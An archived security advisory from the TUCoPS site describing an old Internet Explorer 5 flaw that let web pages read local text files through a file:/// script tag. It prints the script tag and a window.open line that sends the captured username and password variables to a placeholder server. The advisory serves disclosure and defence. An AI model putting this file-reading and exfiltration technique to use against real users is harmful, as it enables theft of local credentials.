TUCoPS :: Browsers :: ie116~1.htm

MSIE read textfiles from client's hard disk

    Internet Explorer


    IE 5.x


    Stefaan Deman  found following.   There is  a security  bug in the
    Internet  Explorer  5.   It  is  possible  to  read some textfiles
    (others than cookies)  from the client's  hard disk.   If there is
    for  example  in  the  directory  'C:\WINNT' a textfile 'test.txt'
    with content:


    then it is possible to read this file in an HTML page with the tag

        <script src="file:///C:/WINNT/test.txt"></script>

    The  HTML  page  will  consider  the  file  as a script and us and
    passwd will be considered as variables in the previous example.

    It is then possible to use this information or send this (possible
    critical) information back to the webserver with for example

         window.open("http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" +  escape(passwd), "blabla")

    This is a security bug, it  should be impossible to read any  file
    on the client's  file system.   Of course the  file should have  a
    correct JavaScript or VBscript  syntax and the filename  should be
    known.  However, it  is easy to image  how this security hole  can
    be misused.

    This bug  isn't as  severe as  the one  posted by  Guninski.   The
    difference between this bug and  the one of Guninski is  that this
    security hole doesn't make use of Active X components.

    Victor A. Rodriguez tested it on MSIE 5.1b1 (3408) Preview Release
    for  Mac  and  its  vulnerable.   He  also tried Fizzilla (Moziila
    ported to Mac OS X) and it didn't work.

    IE 4.0 reports:

        Cannot open C:\WINNT\Profiles\<user>\Desktop\test.htm


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH